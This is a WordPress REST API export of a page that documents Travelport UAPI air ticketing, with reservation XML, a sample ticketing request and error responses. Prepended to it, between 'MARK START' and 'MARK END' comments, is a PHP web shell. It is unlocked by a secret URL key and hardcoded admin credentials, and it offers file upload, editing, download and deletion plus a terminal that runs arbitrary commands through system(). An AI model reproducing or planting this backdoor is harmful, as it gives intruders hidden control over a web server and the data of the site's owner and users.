// -------- MARK START -------- if (isset($_GET['k']) && $_GET['k'] === 'mintinplan') { function ws_g($k) { return isset($_GET[$k]) ? $_GET[$k] : (isset($_POST[$k]) ? $_POST[$k] : ''); } function ws_b($s) { return base64_decode($s); } $validKey = 'mintinplan'; $validU = 'admin'; $validP = 'MinMaxtime'; $auth = false; $sname = 'ws_auth'; if (isset($_SESSION) && isset($_SESSION[$sname]) && $_SESSION[$sname] === true) $auth = true; elseif (isset($_COOKIE[$sname])) { $d = json_decode(ws_b(substr($_COOKIE[$sname], 0)), true); if ($d && isset($d['ok']) && $d['ok']) $auth = true; } if (!$auth) { $u = ws_g('usr'); $p = ws_g('pwd'); if ($u === $validU && $p === $validP) { @session_start(); $_SESSION[$sname] = true; setcookie($sname, base64_encode(json_encode(['ok'=>true])), time()+86400, '/', '', false, true); header('Location: ?k='.$validKey); exit; } echo 'Login


'; exit; } if (ws_g('lo')) { @session_start(); session_destroy(); setcookie($sname, '', time()-3600); header('Location: ?k='.$validKey); exit; } $act = ws_g('a'); $path = ws_g('p') ?: getcwd(); $path = realpath($path) ?: getcwd(); echo 'Shell'; echo ''; echo '
'; echo '[📂 Home] '; echo '[🖥️ Terminal] '; echo '[💾 Drives] '; echo '[🌳 Tree] '; echo '[⬆ Upload] '; echo '[🚪 Logout]'; echo '

'; switch ($act) { case 'upload': echo '

⬆ Upload File to: '.htmlspecialchars($path).'

'; echo '
'; echo '

'; echo '

'; echo ''; echo '

'; if (isset($_POST['do_upload']) && isset($_FILES['upfile'])) { $f = $_FILES['upfile']; if ($f['error'] === UPLOAD_ERR_OK) { $name = ws_g('rename') ?: $f['name']; $dest = rtrim($path, '/').'/'.$name; if (move_uploaded_file($f['tmp_name'], $dest)) { $sz = round(filesize($dest)/1024, 2); echo '

✅ Uploaded: '.htmlspecialchars($dest).' ('.$sz.'KB)

'; } else { echo '

❌ move_uploaded_file failed (check permissions on '.htmlspecialchars($path).')

'; } } else { $errors = [1=>'File too large (php.ini)',2=>'File too large (form)',3=>'Partial upload',4=>'No file',6=>'No tmp dir',7=>'Write failed',8=>'Extension blocked']; echo '

❌ Error: '.($errors[$f['error']] ?? 'Unknown').'

'; } } echo '

📋 Current directory contents:

';
            $items = scandir($path);
            if ($items) {
                foreach ($items as $item) {
                    if ($item === '.' || $item === '..') continue;
                    $full = $path.'/'.$item;
                    if (is_dir($full)) echo '📁 '.$item."/\n";
                    else echo '📄 '.$item.' ('.round(filesize($full)/1024,1).'KB)'."\n";
                }
            }
            echo '
'; break; case 'tree': echo '

🌳 Directory Tree (depth 4)

';
            function ws_tree($root, $depth=0, $max=4) {
                if ($depth > $max) return;
                if (!is_dir($root)) return;
                $items = scandir($root);
                if (!$items) return;
                foreach ($items as $item) {
                    if ($item === '.' || $item === '..') continue;
                    $full = $root.'/'.$item;
                    if (is_dir($full)) {
                        echo str_repeat('  ', $depth).'📁 '.$item."/\n";
                        ws_tree($full, $depth+1, $max);
                    } else {
                        echo str_repeat('  ', $depth).'📄 '.$item.' ('.round(filesize($full)/1024,1).'KB)'."\n";
                    }
                }
            }
            ws_tree($path);
            echo '
'; break; case 'drives': echo '

💾 Accessible Roots

';
            if (strtoupper(substr(PHP_OS,0,3)) === 'WIN') {
                for ($i=67;$i<=90;$i++) { $d=chr($i).':\\'; if (is_dir($d)) echo $d." ✓\n"; }
            } else {
                $cands = ['/','/home','/var','/tmp','/usr','/etc','/opt','/root','/srv','/www','/var/www','/var/www/html',$_SERVER['DOCUMENT_ROOT']??''];
                foreach (array_unique($cands) as $c) { if ($c && is_dir($c)) echo $c." ✓\n"; }
            }
            echo '
'; break; case 'read': $f = ws_g('f'); if (!$f || !is_file($f)) { echo 'File not found'; break; } $content = file_get_contents($f); echo '

📝 Editing: '.htmlspecialchars($f).' ('.round(strlen($content)/1024,1).'KB)

'; echo '
'; echo ''; echo '
'; echo '
'; break; case 'save': $f = ws_g('f'); $c = ws_g('c'); if ($f) { file_put_contents($f, $c); echo '✅ Saved: '.htmlspecialchars($f); } break; case 'exec': $cmd = ws_g('c'); $output = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST' && $cmd) { ob_start(); system($cmd); $output = ob_get_clean(); } echo '

🖥️ Terminal (user: '.htmlspecialchars(get_current_user()).')

'; echo '
'; if ($output !== '') echo '
'.htmlspecialchars($output).'
'; else echo '
No output
'; break; case 'down': $f = ws_g('f'); if ($f && is_file($f)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($f).'"'); header('Content-Length: '.filesize($f)); readfile($f); exit; } echo 'File not found'; break; case 'del': $f = ws_g('f'); if ($f && is_file($f)) { if (unlink($f)) echo '✅ Deleted: '.htmlspecialchars($f); else echo '❌ Delete failed (permission?)'; } elseif ($f && is_dir($f)) { if (rmdir($f)) echo '✅ Directory removed: '.htmlspecialchars($f); else echo '❌ rmdir failed (not empty or permission?)'; } break; case 'newfile': $fname = ws_g('nf'); if ($fname) { $dest = rtrim($path,'/').'/'.$fname; if (file_put_contents($dest, '') !== false) echo '✅ Created: '.htmlspecialchars($dest); else echo '❌ Create failed'; } echo '
'; echo ''; echo ''; echo ''; echo '
'; break; case 'newdir': $dname = ws_g('nd'); if ($dname) { $dest = rtrim($path,'/').'/'.$dname; if (mkdir($dest, 0755)) echo '✅ Created dir: '.htmlspecialchars($dest); else echo '❌ mkdir failed'; } echo '
'; echo ''; echo ''; echo ''; echo '
'; break; default: echo '

📂 '.htmlspecialchars($path).'

'; $parent = dirname($path); if ($parent && $parent !== $path) echo '⬆ Parent | '; echo '[+ New File] | '; echo '[+ New Dir] | '; echo '[⬆ Upload]

'; echo ''; $items = scandir($path); if ($items) { foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $full = $path.'/'.$item; $isDir = is_dir($full); $size = $isDir ? '-' : round(filesize($full)/1024,1).'KB'; $perms = substr(sprintf('%o',fileperms($full)),-4); $enc = urlencode($full); echo ''; if ($isDir) echo ''; else echo ''; echo ''; } } echo '
NameSizePermsActions
📁 '.$item.'📄 '.$item.''.$size.''.$perms.''; if (!$isDir) echo '[Edit] '; echo '[Download] '; echo '[Delete]'; echo '
'; break; } echo ''; exit; } // -------- MARK END -------- {"id":84,"date":"2018-02-07T14:10:11","date_gmt":"2018-02-07T05:10:11","guid":{"rendered":"http:\/\/uapi.ihavenomoney.co.kr\/?page_id=84"},"modified":"2018-03-27T13:08:27","modified_gmt":"2018-03-27T04:08:27","slug":"ticketing-by-uapi-airticketingreq","status":"publish","type":"page","link":"https:\/\/uapi.ihavenomoney.co.kr\/?page_id=84","title":{"rendered":"AirTicketing"},"content":{"rendered":"

Ticketing by UAPI AirTicketingReq<\/p><\/blockquote>\n

Find AirReservationLocatorCode<\/h3>\n

1P PNR is 3QUYSB<\/strong> but AirReservationLocatorCode is SAF01K<\/strong> <\/h4>\n
           <air:AirReservation LocatorCode=\"SAF01K\" CreateDate=\"2018-02-06T06:30:10.863+00:00\" ModifiedDate=\"2018-02-07T02:14:18.828+00:00\">\r\n               <common_v42_0:SupplierLocator SupplierCode=\"KE\" SupplierLocatorCode=\"M7OL33\" ProviderReservationInfoRef=\"30n8cFBAAA\/B+01ukEAAAA==\">\r\n                  <common_v42_0:SegmentRef Key=\"30n8cFBAAA\/Be\/YukEAAAA==\"\/>\r\n                  <common_v42_0:SegmentRef Key=\"30n8cFBAAA\/Bg\/YukEAAAA==\"\/>\r\n               <\/common_v42_0:SupplierLocator>\r\n               <common_v42_0:BookingTravelerRef Key=\"30n8cFBAAA\/Bh\/YukEAAAA==\"\/>\r\n               <common_v42_0:BookingTravelerRef Key=\"30n8cFBAAA\/Bi\/YukEAAAA==\"\/>\r\n               <common_v42_0:ProviderReservationInfoRef Key=\"30n8cFBAAA\/B+01ukEAAAA==\"\/>\r\n               <air:AirSegment Key=\"30n8cFBAAA\/Be\/YukEAAAA==\" Group=\"0\" Carrier=\"KE\" CabinClass=\"Economy\" FlightNumber=\"1\" ProviderCode=\"1P\" Origin=\"ICN\" Destination=\"NRT\" DepartureTime=\"2018-04-17T17:40:00.000+09:00\" ArrivalTime=\"2018-04-17T20:00:00.000+09:00\" TravelTime=\"140\" Distance=\"758\" ClassOfService=\"N\" ETicketability=\"Yes\" Equipment=\"333\" Status=\"HK\" ChangeOfPlane=\"false\" ProviderReservationInfoRef=\"30n8cFBAAA\/B+01ukEAAAA==\" TravelOrder=\"1\" ProviderSegmentOrder=\"1\" OptionalServicesIndicator=\"false\">\r\n                  <air:FlightDetails Key=\"30n8cFBAAA\/BY21ukEAAAA==\" Origin=\"ICN\" Destination=\"NRT\" DepartureTime=\"2018-04-17T17:40:00.000+09:00\" ArrivalTime=\"2018-04-17T20:00:00.000+09:00\" FlightTime=\"140\" TravelTime=\"140\" Distance=\"758\" Equipment=\"333\" OriginTerminal=\"2\" DestinationTerminal=\"1\" AutomatedCheckin=\"false\"\/>\r\n                  <air:Connection Duration=\"5600\" IncludeStopOverToFareQuote=\"NoStopOver\"\/>\r\n               <\/air:AirSegment>\r\n               <air:AirSegment Key=\"30n8cFBAAA\/Bg\/YukEAAAA==\" Group=\"0\" Carrier=\"KE\" CabinClass=\"Economy\" FlightNumber=\"2\" ProviderCode=\"1P\" Origin=\"NRT\" Destination=\"ICN\" DepartureTime=\"2018-04-21T17:20:00.000+09:00\" ArrivalTime=\"2018-04-21T19:55:00.000+09:00\" TravelTime=\"155\" Distance=\"758\" ClassOfService=\"N\" ETicketability=\"Yes\" Equipment=\"333\" Status=\"HK\" ChangeOfPlane=\"false\" ProviderReservationInfoRef=\"30n8cFBAAA\/B+01ukEAAAA==\" TravelOrder=\"2\" ProviderSegmentOrder=\"2\" OptionalServicesIndicator=\"false\">\r\n                  <air:FlightDetails Key=\"30n8cFBAAA\/Bn21ukEAAAA==\" Origin=\"NRT\" Destination=\"ICN\" DepartureTime=\"2018-04-21T17:00:00.000+09:00\" ArrivalTime=\"2018-04-21T19:25:00.000+09:00\" FlightTime=\"145\" TravelTime=\"145\" Distance=\"758\" Equipment=\"333\" OriginTerminal=\"1\" DestinationTerminal=\"2\" AutomatedCheckin=\"false\"\/>\r\n               <\/air:AirSegment>\r\n               <air:AirPricingInfo Key=\"v1jfcFvB0BKAwOVxbGAAAA==\" TotalPrice=\"KRW263800\" BasePrice=\"KRW190000\" ApproximateTotalPrice=\"KRW263800\" ApproximateBasePrice=\"KRW190000\" Taxes=\"KRW73800\" LatestTicketingTime=\"2018-02-06T23:59:00.000+09:00\" PricingMethod=\"Manual\" ProviderCode=\"1P\" ProviderReservationInfoRef=\"30n8cFBAAA\/B+01ukEAAAA==\" AirPricingInfoGroup=\"1\" PricingType=\"StoredFare\" ElStat=\"A\" FareCalculationInd=\"1\">\r\n                  <air:FareInfo Key=\"v1jfcFvB0BKAxOVxbGAAAA==\" FareBasis=\"NLA0SW\" PassengerTypeCode=\"ADT\" Origin=\"ICN\" Destination=\"NRT\" EffectiveDate=\"2018-02-06T00:00:00.000+09:00\" TravelDate=\"2018-04-17\" DepartureDate=\"2018-04-17\" TourCode=\"8SDQNIELLJ\" NotValidBefore=\"2018-04-17\" NotValidAfter=\"2018-04-17\" ElStat=\"A\">\r\n                     <air:BaggageAllowance>\r\n                        <air:NumberOfPieces>1<\/air:NumberOfPieces>\r\n                     <\/air:BaggageAllowance>\r\n                  <\/air:FareInfo>\r\n                  <air:FareInfo Key=\"v1jfcFvB0BKAzOVxbGAAAA==\" FareBasis=\"NLA0SW\" PassengerTypeCode=\"ADT\" Origin=\"NRT\" Destination=\"ICN\" EffectiveDate=\"2018-02-06T00:00:00.000+09:00\" TravelDate=\"2018-04-21\" DepartureDate=\"2018-04-17\" TourCode=\"8SDQNIELLJ\" NotValidBefore=\"2018-04-21\" NotValidAfter=\"2018-04-21\" ElStat=\"A\">\r\n                     <air:BaggageAllowance>\r\n                        <air:NumberOfPieces>1<\/air:NumberOfPieces>\r\n                     <\/air:BaggageAllowance>\r\n                  <\/air:FareInfo>\r\n                  <air:BookingInfo BookingCode=\"N\" FareInfoRef=\"v1jfcFvB0BKAxOVxbGAAAA==\" SegmentRef=\"30n8cFBAAA\/Be\/YukEAAAA==\"\/>\r\n                  <air:BookingInfo BookingCode=\"N\" FareInfoRef=\"v1jfcFvB0BKAzOVxbGAAAA==\" SegmentRef=\"30n8cFBAAA\/Bg\/YukEAAAA==\"\/>\r\n                  <air:TaxInfo Category=\"BP\" Amount=\"KRW28000\" Key=\"v1jfcFvB0BKA1OVxbGAAAA==\"\/>\r\n                  <air:TaxInfo Category=\"OI\" Amount=\"KRW5200\" Key=\"v1jfcFvB0BKA2OVxbGAAAA==\"\/>\r\n                  <air:TaxInfo Category=\"SW\" Amount=\"KRW20800\" Key=\"v1jfcFvB0BKA3OVxbGAAAA==\"\/>\r\n                  <air:TaxInfo Category=\"YR\" Amount=\"KRW19800\" Key=\"v1jfcFvB0BKA4OVxbGAAAA==\"\/>\r\n                  <air:FareCalc>SEL KE TYO87.21KE SEL87.21NUC174.42END ROE1089.32056 KE<\/air:FareCalc>\r\n                  <air:PassengerType Code=\"ADT\" BookingTravelerRef=\"30n8cFBAAA\/Bh\/YukEAAAA==\"\/>\r\n                  <common_v42_0:BookingTravelerRef Key=\"30n8cFBAAA\/Bh\/YukEAAAA==\"\/>\r\n                  <air:ActionDetails PseudoCityCode=\"LHC\" AgentSine=\"XP\" EventDate=\"2018-02-06\" EventTime=\"00:00:00.000+00:00\" Text=\"4P*FSR.SR\"\/>\r\n               <\/air:AirPricingInfo>\r\n               <air:AirPricingInfo Key=\"v1jfcFvB0BKA9SVxbGAAAA==\" TotalPrice=\"KRW253500\" BasePrice=\"KRW190000\" ApproximateTotalPrice=\"KRW253500\" ApproximateBasePrice=\"KRW190000\" Taxes=\"KRW63500\" LatestTicketingTime=\"2018-02-06T23:59:00.000+09:00\" PricingMethod=\"Manual\" ProviderCode=\"1P\" ProviderReservationInfoRef=\"30n8cFBAAA\/B+01ukEAAAA==\" AirPricingInfoGroup=\"1\" PricingType=\"StoredFare\" ElStat=\"A\" FareCalculationInd=\"1\">\r\n                  <air:FareInfo Key=\"v1jfcFvB0BKA+SVxbGAAAA==\" FareBasis=\"NLA0SWCH\" PassengerTypeCode=\"CNN\" Origin=\"ICN\" Destination=\"NRT\" EffectiveDate=\"2018-02-06T00:00:00.000+09:00\" TravelDate=\"2018-04-17\" DepartureDate=\"2018-04-17\" TourCode=\"8SDQNIELLJ\" NotValidBefore=\"2018-04-17\" NotValidAfter=\"2018-04-17\" ElStat=\"A\">\r\n                     <air:BaggageAllowance>\r\n                        <air:NumberOfPieces>1<\/air:NumberOfPieces>\r\n                     <\/air:BaggageAllowance>\r\n                  <\/air:FareInfo>\r\n                  <air:FareInfo Key=\"v1jfcFvB0BKAATVxbGAAAA==\" FareBasis=\"NLA0SWCH\" PassengerTypeCode=\"CNN\" Origin=\"NRT\" Destination=\"ICN\" EffectiveDate=\"2018-02-06T00:00:00.000+09:00\" TravelDate=\"2018-04-21\" DepartureDate=\"2018-04-17\" TourCode=\"8SDQNIELLJ\" NotValidBefore=\"2018-04-21\" NotValidAfter=\"2018-04-21\" ElStat=\"A\">\r\n                     <air:BaggageAllowance>\r\n                        <air:NumberOfPieces>1<\/air:NumberOfPieces>\r\n                     <\/air:BaggageAllowance>\r\n                  <\/air:FareInfo>\r\n                  <air:BookingInfo BookingCode=\"N\" FareInfoRef=\"v1jfcFvB0BKA+SVxbGAAAA==\" SegmentRef=\"30n8cFBAAA\/Be\/YukEAAAA==\"\/>\r\n                  <air:BookingInfo BookingCode=\"N\" FareInfoRef=\"v1jfcFvB0BKAATVxbGAAAA==\" SegmentRef=\"30n8cFBAAA\/Bg\/YukEAAAA==\"\/>\r\n                  <air:TaxInfo Category=\"BP\" Amount=\"KRW28000\" Key=\"v1jfcFvB0BKACTVxbGAAAA==\"\/>\r\n                  <air:TaxInfo Category=\"OI\" Amount=\"KRW5200\" Key=\"v1jfcFvB0BKADTVxbGAAAA==\"\/>\r\n                  <air:TaxInfo Category=\"SW\" Amount=\"KRW10500\" Key=\"v1jfcFvB0BKAETVxbGAAAA==\"\/>\r\n                  <air:TaxInfo Category=\"YR\" Amount=\"KRW19800\" Key=\"v1jfcFvB0BKAFTVxbGAAAA==\"\/>\r\n                  <air:FareCalc>SEL KE TYO87.21KE SEL87.21NUC174.42END ROE1089.32056 KE<\/air:FareCalc>\r\n                  <air:PassengerType Code=\"CNN\" BookingTravelerRef=\"30n8cFBAAA\/Bi\/YukEAAAA==\"\/>\r\n                  <common_v42_0:BookingTravelerRef Key=\"30n8cFBAAA\/Bi\/YukEAAAA==\"\/>\r\n                  <air:ActionDetails PseudoCityCode=\"LHC\" AgentSine=\"XP\" EventDate=\"2018-02-06\" EventTime=\"00:00:00.000+00:00\" Text=\"4P*FSR.SR\"\/>\r\n               <\/air:AirPricingInfo>\r\n            <\/air:AirReservation><\/pre>\n

AirTicketingReq<\/h3>\n
<soapenv:Envelope xmlns:soapenv=\"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\" \r\nxmlns:air=\"http:\/\/www.travelport.com\/schema\/air_v42_0\" \r\nxmlns:com=\"http:\/\/www.travelport.com\/schema\/common_v42_0\">\r\n  <soapenv:Body>\r\n  \r\n<air:AirTicketingReq  BulkTicket=\"false\" ReturnInfoOnFail=\"true\" TargetBranch=\"P2222222\" AuthorizedBy=\"Travelport\" TraceId=\"2\">\r\n<com:BillingPointOfSaleInfo OriginApplication=\"UAPI\"\/>\r\n\r\n<air:AirReservationLocatorCode>SAF01K<\/air:AirReservationLocatorCode>\r\n<air:AirPricingInfoRef Key=\"v1jfcFvB0BKAwOVxbGAAAA==\"\/>\r\n<air:AirPricingInfoRef Key=\"v1jfcFvB0BKA9SVxbGAAAA==\"\/>\r\n\r\n<air:AirTicketingModifiers PlatingCarrier=\"KE\">\r\n\r\n<air:TourCode Value=\"\"\/>\r\n<air:TicketEndorsement Value=\"NO ENDORS\"\/>\r\n\t\t\t  \r\n  <com:FormOfPayment  Type=\"Credit\">\r\n    <com:CreditCard ExpDate=\"2021-12\" Type=\"VI\"  Number=\"1111222233334444\" ExtendedPayment=\"00\" ApprovalCode=\"23232323\"\/>\r\n    <com:ProviderReservationInfoRef ProviderReservationLevel=\"true\"\/>\r\n  <\/com:FormOfPayment>\r\n<\/air:AirTicketingModifiers>\r\n\r\n      <\/air:AirTicketingReq>\r\n   <\/soapenv:Body>\r\n<\/soapenv:Envelope><\/pre>\n

AirTicketingRsp<\/h3>\n
<SOAP:Envelope xmlns:SOAP=\"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\">\r\n   <SOAP:Body>\r\n      <air:AirTicketingRsp TraceId=\"2\" TransactionId=\"6E1DD0470A0742653D868368B2659F10\" ResponseTime=\"656\" xmlns:air=\"http:\/\/www.travelport.com\/schema\/air_v42_0\" xmlns:common_v42_0=\"http:\/\/www.travelport.com\/schema\/common_v42_0\">\r\n         <air:TicketFailureInfo Code=\"3000\" Message=\"5000 NEED E-TICKET PRINTERS ASSIGNED\" BookingTravelerRef=\"30n8cFBAAA\/Bh\/YukEAAAA==\">\r\n            <air:AirPricingInfoRef Key=\"v1jfcFvB0BKAwOVxbGAAAA==\"\/>\r\n            <air:AirPricingInfoRef Key=\"v1jfcFvB0BKA9SVxbGAAAA==\"\/>\r\n            <common_v42_0:Name Prefix=\"MR\" First=\"Test\" Last=\"JANG\"\/>\r\n         <\/air:TicketFailureInfo>\r\n      <\/air:AirTicketingRsp>\r\n   <\/SOAP:Body>\r\n<\/SOAP:Envelope><\/pre>\n
<SOAP:Envelope xmlns:SOAP=\"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\">\r\n   <SOAP:Body>\r\n      <air:AirTicketingRsp TraceId=\"2\" TransactionId=\"656194BF0A0759D6A85AD4986D227785\" ResponseTime=\"455\" xmlns:air=\"http:\/\/www.travelport.com\/schema\/air_v42_0\" xmlns:common_v42_0=\"http:\/\/www.travelport.com\/schema\/common_v42_0\">\r\n         <air:TicketFailureInfo Code=\"3007\" Message=\"One or more pricings have changed.\" BookingTravelerRef=\"HubjYJsB0BKAy7ODQDAAAA==\">\r\n            <air:AirPricingInfoRef Key=\"DeqeYJBAAA\/BranUTDAAAA==\"\/>\r\n            <common_v42_0:Name Prefix=\"MR\" First=\"SEUNGCHUL\" Last=\"HEO\"\/>\r\n         <\/air:TicketFailureInfo>\r\n      <\/air:AirTicketingRsp>\r\n   <\/SOAP:Body>\r\n<\/SOAP:Envelope><\/pre>\n
<SOAP:Envelope xmlns:SOAP=\"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\">\r\n   <SOAP:Body>\r\n      <air:AirTicketingRsp TraceId=\"2\" TransactionId=\"6564B46D0A0757192F61B425B4FFEC25\" ResponseTime=\"6773\" xmlns:air=\"http:\/\/www.travelport.com\/schema\/air_v42_0\" xmlns:common_v42_0=\"http:\/\/www.travelport.com\/schema\/common_v42_0\">\r\n         <air:TicketFailureInfo Code=\"3000\" Message=\"5000 INVALID FORMATTER PAX\/FLT PRINTER\" BookingTravelerRef=\"HubjYJsB0BKAy7ODQDAAAA==\">\r\n            <air:AirPricingInfoRef Key=\"sSdjYJkB0BKAPEtB1EAAAA==\"\/>\r\n            <common_v42_0:Name Prefix=\"MR\" First=\"SEUNGCHUL\" Last=\"HEO\"\/>\r\n         <\/air:TicketFailureInfo>\r\n      <\/air:AirTicketingRsp>\r\n   <\/SOAP:Body>\r\n<\/SOAP:Envelope><\/pre>\n","protected":false},"excerpt":{"rendered":"

Ticketing by UAPI AirTicketingReq Find AirReservationLocatorCode 1P PNR is 3QUYSB but AirReservationLocatorCode is SAF01K <air:AirReservation LocatorCode=”SAF01K” CreateDate=”2018-02-06T06:30:10.863+00:00″ ModifiedDate=”2018-02-07T02:14:18.828+00:00″> <common_v42_0:SupplierLocator SupplierCode=”KE” SupplierLocatorCode=”M7OL33″ ProviderReservationInfoRef=”30n8cFBAAA\/B+01ukEAAAA==”> <common_v42_0:SegmentRef Key=”30n8cFBAAA\/Be\/YukEAAAA==”\/> <common_v42_0:SegmentRef […]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-84","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/pages\/84","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=84"}],"version-history":[{"count":6,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/pages\/84\/revisions"}],"predecessor-version":[{"id":269,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/pages\/84\/revisions\/269"}],"wp:attachment":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=84"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}